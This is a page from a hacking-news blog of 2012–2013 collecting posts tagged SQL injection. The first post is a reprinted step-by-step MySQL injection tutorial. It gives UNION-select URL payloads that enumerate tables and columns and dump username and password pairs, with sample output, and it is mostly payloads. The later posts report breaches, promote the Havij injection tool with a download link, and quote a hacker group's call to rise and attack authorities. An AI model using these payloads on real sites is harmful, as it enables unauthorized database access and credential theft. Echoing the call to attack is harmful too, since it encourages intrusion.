Showing posts sorted by date for query sql-i. Sort by relevance Show all posts
Showing posts sorted by date for query sql-i. Sort by relevance Show all posts

We Are The Best Tool For Web Application Security (Discovering Infamous Sql-i Technique)

Posted by Avik Sarkar On 12/02/2013 01:00:00 am

We Are The Best Tool For Web Application Security (Discovering The Infamous Sql-injection Technique) 

Today I am proudly sharing an article made by Mr. Rafael Souza one of the great admirer and fan of VOGH has gladly shared his brilliant research paper on SQL-Injection (MySql) with us. Rafael is a very passionate on cyber security domain and he is keenly involved with GreyHat Community and Maintainer design of Brazilian Backtrack Team. So without wasting time lets go and see what Rafael has for us:- 

Discover The Infamous MySQL Injection Technique 
                                                                                        
ABSTRACT:
It is known that computers and software are developed and designed by humans, human error is a reflection of a mental response to a particular activity. Did you know that numerous inventions and discoveries are due to misconceptions?
There are levels of human performance based on the behavior of mental response , explaining in a more comprehensive, we humans tend to err , and due to this reason we are the largest tool to find these errors , even pos software for analysis and farredura vulnerabilities were unimproved by us.
                                                                                                       
Understand the technique MySQL Injection: 
One of the best known techniques of fraud by web developers is the SQL Injection. It is the manipulation of a SQL statement using the variables who make up the parameters received by a server-side script, is a type of security threat that takes advantage of flaws in systems that interact with databases via SQL. SQL injection occurs when the attacker can insert a series of SQL statements within a query (query) by manipulating the input data for an application. 

STEP BY STEP
 
(Figure 1) Detecting
Searching Column number (s): We will test earlier in error, then no error may be said to find.
(Figure 2) SQL Error 
Host Information,
Version of MySQL system used on the server.
(Figure 3) Host Information
(Figure 4) Location of the Files
Current database connection used between the "input" to the MySQL system
(Figure 5) Users of MySQL
(Figure 6) Current Time
Brute Force or Shooting
This happens in versions below 5.x.y
(Figure 7) Testing

Dump: This happens in versions up 5.x.y [ 1º Method ]
http://[site]/query.php?string= 1 union all select 1,2,3,4,group_concat(table_name) from information_schema.tables where table_schema=database()--
usuarios,rafael,fontes,souza,greyhat,hackers,test,ownz,you
or
Unknown column 'usuarios,rafael,fontes,souza,greyhat,hackers,test,ownz,you' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'usuarios,rafael,fontes,souza,greyhat,hackers,test,ownz,you' at line 1

<>------------------------<>-------------------------<>--------------------------<>

[ 2º Method ]

http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(table_name) from information_schema.tables limit 0,1--
CHARACTER_SETS
or
Unknown column 'CHARACTER_SETS' in 'where clause'
ou
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'CHARACTER_SETS' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(table_name) from information_schema.tables limit 1,2--
COLLATIONS
or
Unknown column 'COLLATIONS' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'COLLATIONS' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(table_name) from information_schema.tables limit 16,17--
usuarios
or
Unknown column 'usuarios' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'usuarios' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(table_name) from information_schema.tables limit 17,18--
rafael
or
Unknown column 'rafael' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'rafael' at line 1
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

Searching Column (s) of a given table
* Brute Force / Shooting
This happens in versions below 5.x.y
http://[site]/query.php?string= 1 union all select 1,2,3,4,nome from usuarios--
Unknown column 'rafael1' in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'rafael1' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,churros from usuarios--
Unknown column 'rafael1' in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'rafael1' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,login from usuarios--
_Rafa_
or
Unknown column '_Rafa_' in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '_Rafa_' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,passwd from usuarios--
rafael1337
or
Unknown column 'rafael1337' in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'rafael1337' at line 1

=--------------------------=--------------------------=--------------------------=--------------------------=
Dump
This happens in versions up 5.x.y [ 1º Method ]

"usuarios" hexadecimal -> "7573756172696f73"

http://[site]/query.php?string= 1 union all select 1,2,3,4,group_concat(column_name) from information_schema.columns where table_name=0x7573756172696f73--
login,passwd,id,texto
or
Unknown column 'login,passwd,id,texto' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'login,passwd,id,texto' at line 1

<>------------------------<>-------------------------<>--------------------------<>

[ 2º Method ]

"usuarios" decimal -> "117,115,117,97,114,105,111,115"

http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(column_name) from information_schema.columns where table_name=char(117,115,117,97,114,105,111,115) limit 0,1--
login
or
Unknown column 'login' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'login' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(column_name) from information_schema.columns where table_name=char(117,115,117,97,114,105,111,115) limit 1,2--
passwd
or
Unknown column 'passwd' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'passwd' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(column_name) from information_schema.columns where table_name=char(117,115,117,97,114,105,111,115) limit 2,3--
id
or
Unknown column 'id' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'id' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(column_name) from information_schema.columns where table_name=char(117,115,117,97,114,105,111,115) limit 3,4--
texto
or
Unknown column 'text' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'text' at line 1
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Extracting data from the columns of a given table
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(login,0x20,0x3a,0x20,senha) from usuarios--
_Rafa_ : fontes1337
or
Unknown column '_Rafa_ : fontes1337' in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '_Rafa_ : fontes1337' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,group_concat(login,0x20,0x3a,0x20,senha) from usuarios--
_Rafa_ : fontes1337,l337_ : 3_l33t,greyhats : fontes,hackers : mitnick,green : rha_infosec
or
Unknown column '_Rafa_ : fontes1337,l337_ : 3_l33t,greyhats : fontes,hackers : mitnick,green : rha_infosec ‘in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '_Rafa_ : fontes1337,l337_ : 3_l33t,greyhats : fontes,hackers : mitnick,green : rha_infosec' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat_ws(0x20,0x3a,0x20,login,senha) from usuarios--
_RHA_ : infosec1337
or
Unknown column '_RHA_ : infosec1337‘ in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '_Mlk_ : gremio1903' at line 1

=--------------------------=
Concat
group_concat() => Search all you want with ascii caracters
concat() => search what you want with ascii caracters
concat_ws() => unite

Hexadecimal
0x3a => :
0x20 => space
0x2d => -
0x2b => +

Readers, this article is for educational purposes only, could continue explaining how to exploit web sites, but that is not my intention.
It is known that the impact of the change may provide unauthorized access to a restricted area, being imperceptible to the eye of an inexperienced developer, it may also allow the deletion of a table, compromising the entire application, among other features. So I want to emphasize that this paper is for security researcher and developers to beware and test your code.

CONCLUSION
Many companies are providing important information on its website and database, information is the most valuable asset is intangible, the question is how developers are dealing with this huge responsibility?
The challenge is to develop increasingly innovative sites, coupled with mechanisms that will provide security to users.
The purpose of this paper is to present what is SQL Injection, how applications are explored and techniques for testing by allowing the developer to customize a system more robust and understand the vulnerability.
**********
I hope you all will enjoy the above article, as I did. On behalf of entire VOGH Team I am sincerely thanking Mr. Rafael Souza for his remarkable contribution. 
To get more of such exclusive research papers along with all kind of breaking cyber updates across the globe just stay tuned with VOGH


SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

LulzSec Hacker Cody Kretsinger Sentenced 1 Year Imprisonment For Sony Breach

Posted by Avik Sarkar On 4/20/2013 05:03:00 pm

LulzSec Hacker Cody Kretsinger Sentenced 1 Year Imprisonment For Security Breach of Sony Pictures Entertainment  

Infamous LulzSec hacker Cody Kretsinger who pleaded guilty last year in front of Federal Court of California for taking part in an extensive computer breach of Sony Pictures Entertainment server has faced judgement. 25 year aged Kretsinger who is also known as "Recursion" was one of the key member of Lulz Security, widely known to us as LulzSec, an offshoot of the international hacking group Anonymous. According to federal prosecutors, Cody Kretsinger has been sentenced to one year in prison in  Los Angeles. This court rule has been followed by home detention. Kretsinger, was also been ordered by a U.S. district judge in Los Angeles to perform 1,000 hours of community service after his release from prison, said Thom Mrozek, spokesman for the U.S. Attorney's Office in Los Angeles. Although prosecutors refused to say whether the hacker was co-operating with authorities in return for a softer sentence. 
During last year's plea hearing, Kretsinger told a federal judge that he gained access to the Sony Pictures website and gave the information he found there to other members of LulzSec, who posted it on the group's website and Twitter. "I joined LulzSec, your honor, at which point we gained access to the Sony Pictures website," said Kretsinger in the federal court. Prosecutors said Kretsinger and other LulzSec hackers, including those known as "Sabu" and "Topiary," stole the personal information of thousands of people after launching an "SQL injection" attack on the website; ultimately caused the unit of Sony Corp more than $600,000 in finical damage, along with that the attack caused bad impact and loss of faith for Sony Corporation and it's customers across the globe. 
While talking about this story, we would like to recap the decent history - where the arrest followed by guilty pleading of all the key members of LulzSec including  Ryan Cleary, Jake DavisJeremy HammondRaynaldo RiveraCody Kretsinger came a month after court documents revealed that Anonymous leader "Sabu," whose real name is Hector Xavier Monsegur, turned traitor to his community and became FBI informer and provided all the information on fellow hackers.


-Source (Reuters & Yahoo) 





SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Adobe Confirms Data Breach, Hacker Leaked More Than 150,000 Customer Details

Posted by Avik Sarkar On 11/21/2012 01:17:00 am

Adobe Confirms Data Breach, Hacker Leaked More Than 150,000 Customer Details 

Yet again Adobe, the American multinational computer software company had fallen victim of cyber attack. In September Adobe faced what it called a sophisticated cyber attack where hackers have breached Adobe server in order to compromise certificate to sign malware. As a move Adobe revoked those certificates on October 4th. After that massacre, here again one of Adobe's databases has been breached by a hacker and that it has temporarily taken offline the affected Connectusers.com website. The attacker who claimed responsibility for the attack, told that he used a SQL injection exploit in the breach. Adobe confirmed the breach and said that the hacker indeed managed to break into an Adobe server and copy the private credentials of approximately 150,000 users – including their names, email addresses and password hashes. Those affected accounts include Adobe customers, Adobe employees and partners along with U.S. military users including U.S. Air Force users, and users from Google, NASA, universities, and other companies. To prove the attack, the intruder, who goes by the name of "ViruS_HimA" and claims to be from Egypt, has released extracts from his haul on the Pastebin text hosting service. 
"It was an SQL Injection vulnerability -- somehow I was able to dump the database in less requests than normal people do," said ViruS_HimA. Users passwords for the Adobe Connect users site were stored and hashed with MD5, says the hacker, which made them "easy to crack" with freely available tools. And Adobe wasn't using WAFs on the servers, the hacker notes. "I just want to be clear that I'm not going against Adobe or any other company. I just want to see the biggest vendors safer than this," he told the press. "Every day we see attacks targeting big companies using Exploits in Adobe, Microsoft, etc. So why don't such companies take the right security procedures to protect them customers and even themselves?"
"Adobe is a very big company but they don't really take care of them security issues, When someone report vulnerability to them, It take 5-7 days for the notification that they've received your report!!" he wrote. "It even takes 3-4 months to patch the vulnerabilities!" 
While talking about such big cyber attacks, here we would like to give you reminder that in the last few months we have been a slew of attacks against the following sites: Guild Wars 2GamigoBlizzardYahooLinkedIneHarmonyFormspringAndroid ForumsGamigo,  Nvidia,BlizzardPhilips, Zynga, VMWare, & so on. For all the latest on cyber security and hacking related stories; stay tuned with VOGH


-Source (Dark Reading, The-H)





SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Havij v1.16 Advanced & Automated SQL Injection Tool Released

Posted by Avik Sarkar On 6/21/2012 12:21:00 am

Havij v1.16 Advanced & Automated SQL Injection Tool Released
One of the most preferred and widely used SQL-injector Havij has released another updated version (v1.16). In the middle of last year ITSec team made Havij 1.15 available, so after one year of hard work now we got the next edition of this marvellous SQL-i tool. As per survey Havij is listed as one of the finest and widely used tool used for finding SQL Injection vulnerabilities on a web page. It has been thoroughly used by hackers along with penetration testers over the whole spectrum. 

Brief About Havij :- It can take advantage of a vulnerable web application. By using this software user can perform back-end database fingerprint, retrieve DBMS users and  password hashes, dump tables and columns, fetching data from the database, running SQL  statements and even accessing the underlying file system and executing commands on the  operating system. The power of Havij that makes it different from similar tools is its injection methods. The success rate is more than 95% at injectiong vulnerable targets using Havij. The user friendly GUI (Graphical User Interface) of Havij and automated settings and detections makes it easy to use for everyone even amateur users.

New Features :-
  • Multithreading
  • Oracle Blind injection method.
  • Automatic all parameter scan added.
  • New blind injection method (no more ? char.)
  • Retry for blind injection.
  • A new method for tables/columns extraction in mssql blind.
  • A WAF bypass method for mysql blind.
  • Getting tables and columns even when can not get current database.
  • Auto save log.
Bug Fixed:- 
  • url encode bug fixed.
  • Trying time based methods when mssql error based and union based fail.
  • Clicking get columns would delete all tables.
  • Reseting time based method delay when applying settings.
  • Oracle and PostgreSQL detection

For additional information & to Download Havij v1.16 Click Here 
 


SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Researcher.ibm.com (IBM Research) Hacked By KHS

Posted by Avik Sarkar On 5/19/2012 06:48:00 pm

Researcher.ibm.com (IBM Research) Hacked By KHS 

After successful execution of Operation Greek, now the hacker collective group dubbed Kosova Hacker Security or in other word KHS targeted IT giant & multinational technology and consulting corporation IBM. In this attack KHS successfully hacked into the official site of IBM Researcher. In their statement hacker group said that IBM had a SQL-i & remote code execution vulnerability, which lead them access on its server. According the KHS spokesman another hacker group named Teamgreyhat figure out this vulnerability which allow KHS to breach the server and deface index page. As expected the hacker group also created a deface mirror on Zone-H. As per the resources, IBM authority immediately patch the security hole and restore the site to its normal format. Earlier this hacker hacker group take lead role in many cyber attack on Ukraine, Israel, Hotmail and many more




SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

2 Norwegian Teen Hackers of "TeaMp0isoN" Arrested By British Police

Posted by Avik Sarkar On 5/12/2012 09:52:00 pm

2 Norwegian Teen Hackers of "TeaMp0isoN" Arrested By British Police (PCeU)

Earlier in last month MI6 arrested the leader of TeaMp0isoN code named "TriCk" along with few other active members who ware directly involved behind the Denial of Service attack on MI6. Now two Norwegian teenagers, aged 18 and 19, have been arrested in connection with the distributed denial-of-service (DDoS) attack on the web site for the UK's Serious Organised Crime Agency (SOCA) and for swamping British intelligence agency (MI6) hotline with automated Skype calls. These two hackers ware the active members of hacker collective TeaMp0isoN and MLT. These two suspects are arrested in Newcastle on Wednesday evening, and is being questioned about offences under the Computer Misuse Act. Computer equipment has been seized for forensic analysis - and no doubt investigators are hoping that they may find digital clues which could help uncover other suspected hackers. Erik Moestue, a Norwegian prosecutor, said "We have arrested the two we think were most important in these attacks, but we still want to talk to more people". The offence that the two stand accused of carries a maximum jail sentence of six years. "The case is still under investigation," added Moestue, noting that "It is still too early to say anything about the motive for the actions"
The authorities, no doubt, will be hoping to confirm that they have arrested the correct man. Certainly, MLT's Twitter account has been silent since 6:27pm on Wednesday evening. According to the authorities these arrest is part of an ongoing investigation by the Police Central e-Crime Unit (PCeU) division of the Metropolitan Police into various hacking gangs who have made headlines in the last year or so. 
Earlier TeaMp0isoN was directly involved with Anonymous in #OpRobinHood #OpCensorThis. Also they have found SQL-i vulnerability on the Official NASA forum, and like this attack TeaMp0isoN also hacked English Defence League (EDL) ,T-Mobile USA, BlackBerry blog and many more





SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

TeaMp0isoN Threatened Authorities After Leader's Arrest

Posted by Avik Sarkar On 4/19/2012 06:01:00 pm

TeaMp0isoN Threatened Authorities After Leader's Arrest 

Few days ago a hacker collective group named TeaMp0isoN took responsibility of hacking into British intelligence agency (MI6). Immediately after the attack MI6 arrested the leader of TeaMp0isoN code named "TriCk" along with few other active members who ware directly involved behind the Denial of Service attack on MI6. But the story is not over yet. The official twitter account of TeaMp0isoN issued a warning that it will fight back against the arrest of its members. 

The group linked to a Pastebin statement with a call for other hackers to unite in attacking law enforcement agencies. 

Message of TeaMp0isoN:- 
"We've lost the first and most important member of our team; our founder, our brother, our family member. Most importantly we lost a fighter for freedom, a fighter against corruption.
He strived for justice, and constantly fought against oppression and corruption, to help spread awareness on humanitarian causes, and now, he is no longer with us.
Most of you think that this is end of TeaMp0isoN and that this is end of our fight.
We're glad to shout:
#################################
#_ITS NOT OVER, IT JUST STARTED_#
#_ITS NOT OVER, WE ARE STRONGER_#
#_ITS NOT OVER, WE ARE UNITED_  #
#################################

I ask you, a fellow hacker, as a blackhat, to rise, to unite and to fight. For years the hacking scene for the most part has been misrepresented by skids, who have inevitably led to the copious amounts of faggotry and butthurt which currently pollutes the scene. Whitehats continue to lurk and grow, and nothing is preventing them from disclosing exploits.
As a collective we have to stop this, to ascend out of the underground and show the world we are not fucking around, something which TriCk firmly believed in. We, as hackers, have to unite to revive the blackhat scene, for TriCk... and everything that we stand for.
Do you support TeaMp0isoN? Help out via:
irc.tsukihi.me
#retaliation
-----------------------------------------
root@TeaMp0isoN:~# rm -rf skids/*
root@TeaMp0isoN:~# rm -rf whitehats/*
root@TeaMp0isoN:~# rm -rf governments/*
root@TeaMp0isoN:~# rm -rf justicesystem/*
root@TeaMp0isoN:~# rm -rf police/*
-----------------------------------------  ..."

Earlier TeaMp0isoN was directly involved with Anonymous in #OpRobinHood #OpCensorThis. Also they have found SQL-i vulnerability on the Official NASA forum, and like this attack TeaMp0isoN also hacked English Defence League (EDL) and exposed members personal data & many more.



SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Mega Malls India Hacked By ShadowFiend_hax0r (The Hackers Army)

Posted by Avik Sarkar On 4/15/2012 11:18:00 pm

Mega Malls India Hacked By ShadowFiend_hax0r (The Hackers Army

A Filipino hacker code named "ShadowFiend_hax0r" from The Hackers Army took responsibility for hacking into the official website of Shopping Malls India also known as Mega Malls. According to the hacker - Shopping Malls India have SQL-injection vulnerability and exploiting that he gained access into the database of the website. 

The hacked database can be found on a pastebin release by the hacker. Above screen shot is clearly indicating that Shopping Malls India is indeed vulnerable to SQL-i.



SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

LulzSec Hacker Cody Kretsinger Pleaded Guilty in Sony Breach

Posted by Avik Sarkar On 4/06/2012 10:33:00 pm

LulzSec Hacker Cody Kretsinger Pleaded Guilty in Sony Breach 

Accused LulzSec hacker Cody Kretsinger pleaded guilty on Thursday in federal court in California to taking part in an extensive computer breach of Sony Pictures Entertainment. Kretsinger, a 24-year-old who used the moniker "Recursion," pleaded guilty to one count each of conspiracy and unauthorized impairment of a protected computer in a deal with prosecutors.
"I joined LulzSec, your honor, at which point we gained access to the Sony Pictures website," Kretsinger told the judge after entering his guilty plea. He testified that he gave the information he got from the Sony site to other members of LulzSec, who then posted it onto the group's website and on Twitter. Kretsinger flew from Decatur, Illinois, to Los Angeles for the hearing, and responded to the judge's questions calmly, with his hands clasped behind his back.
He and other LulzSec hackers, including those known as "Sabu" and "Topiary," stole the personal information of thousands of people after launching an "SQL injection" attack on the website, and ultimately caused Sony Pictures Entertainment more than $600,000 in damages, Assistant U.S. Attorney Eric Vandevelde said.The plea agreement is under seal, although Vandevelde said Kretsinger would likely receive substantially less than the 15-year maximum sentence he faces. He could also be forced to repay any damages. His sentencing is scheduled for July 26. Neither Kretsinger nor his lawyer would comment after the proceedings.


-Source (Yahoo News & Reuters)


SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Library of Congress (Govt. of United States) Under Cyber-Attack, Database Exposed By BlitzSec

Posted by Avik Sarkar On 3/06/2012 08:42:00 pm

Library of Congress (Govt. of United States) Under Cyber-Attack, Database Exposed By BlitzSec 

Official website of Library of Congress (Govt. of United States) faced cyber attack from a newly formed hacker group named BlitzSec. The hackers have found SQL-i vulnerability on the Library of Congress official site which leads them to gain access on the database and exposed many credentials. In a pastebin relase BlitzSec revealed full database including DB Tables, Columns, User-id, Email, Password, Admin details and so on. 
Earlier this group has found serious security flaws in AOL.com & Ask.com which can even lead to cookie catching attacks.

Press Release of BlitzSec :- 
"Congress this is a message to you, STOP passing laws of tyranny, STOP letting those such as Rothschild and Rockefeller control the government.  Get the printing press out of the hands of the FED and back under the houses of congress!  STOP throwing the Constitution of the United States on the ground and using it as your personal doormat, stand by the Constitution, protect it from those who wish to abolish it which inturn will abolish any and all rights we have.  We are in a police state, you have the power to stop it, you have the power to return us back to what we were before thing such as NDAA and the infamous "Patriot Act". 
You say we are the criminals?  You say we are the terrorists, well ladies and gentle men of congress, I'm sorry to say but you are wrong... Dead wrong, you my friends are the criminals, you my friends are the terrorists.  The Constitution is not just "An outdated piece of paper" as you and the rest of the government think, it is what our country was founded the those principles were what helped form this great nations, and you are destroying it now.  If you do not do something soon, you can take our word, We The People will rise up, We The People will put an end to it and We The People will return this country back to its former greatness..."




SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

China Police & Houston Country Official Site Hacked By Anonymous

Posted by Avik Sarkar On 2/21/2012 04:59:00 pm

China Police (Govt. of China) & Houston Country Official Site Hacked By Anonymous  

Infamous hacker named CabinCr3w from Anonymous strikes again. He broke into the official website of Houston County and defaced the index page with a racy images of girls in their underwear. This attack took place yesterday late night confirmed by the tweet of the hacker collective group. After that the site remained off-line for few hours and today morning it was restored to its normal format. Soon after this one they suddenly moved to China and there another hacker named s3rverexe hit the official website of Panjin Dragnet which happens to be that of the Panjin City Public Security Bureau of Chinese Police. In a pastebin release the hacker said the website is vulnerable to SQL-i and he openly posted the vulnerable links by which an attacker can exploit the database of that site. 
The above screen shot is taken from one of the official twitter account of this hacker collective group where they have taken responsibility of this two hack.  



 

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

United Nation Hacked, Vulnerability Exposed & Database Dumped

Posted by Avik Sarkar On 2/15/2012 05:44:00 pm

United Nation Hacked, Vulnerability Exposed & Database Dumped By Casi
United Nations official website again became the victim of cyber attack. Earlier TeaMp0isoN has hacked the United Nation server and stolen more than thousand of user name and passwords. This time another hacker named Casi targeted United Nation. In a press release the hacker has posted many blind SQL-i vulnerable links of UN official site by which any attacker can get get inside the db and create lots of damages. The hacker group also  dumped the database of United Nation. According to the hacker "I fuck actually system... I fighting for Internet Freedom, equiality & rights for all. You're FREEDOM my brothers & my sisters ! <3" The dumped database can be found on a pastebin release by the hacker where they have also claimed that they are fighting for freedom. So it seems that the UN just has bad cyber security. It must be embarrassing for the them to be hacked by such a basic SQL injection attack. Passwords were not exposed, but the real danger lies in what other hackers can do with the information. Still United Nation did not replied about this hack.



SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

New York State Senate Official Site Is Vulnerable

Posted by Avik Sarkar On 1/29/2012 07:16:00 pm

New York State Senate Official Site Is Vulnerable
Few days ago Sec Indi Security Team exposed a Cross-site request forgery (CSRF) vulnerability in wikileaks website. Again they have found SQL-i on the official website of New York State Senate. Earlier this group have also detected  SQL-i vulnerability on the official website of US Senate, also they have hacked the Admin panel of famous Indian website click India. The vulnerability on the NY State Senate is still UN-patched. They hacker group has submitted the vulnerable link to VOGH and to know that click here. According to the hackers group - an attack can easily misuse this security flaws and can gain illegal access on the database of the NY Sate Senate.



SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Related Posts Plugin for WordPress, Blogger...

Site search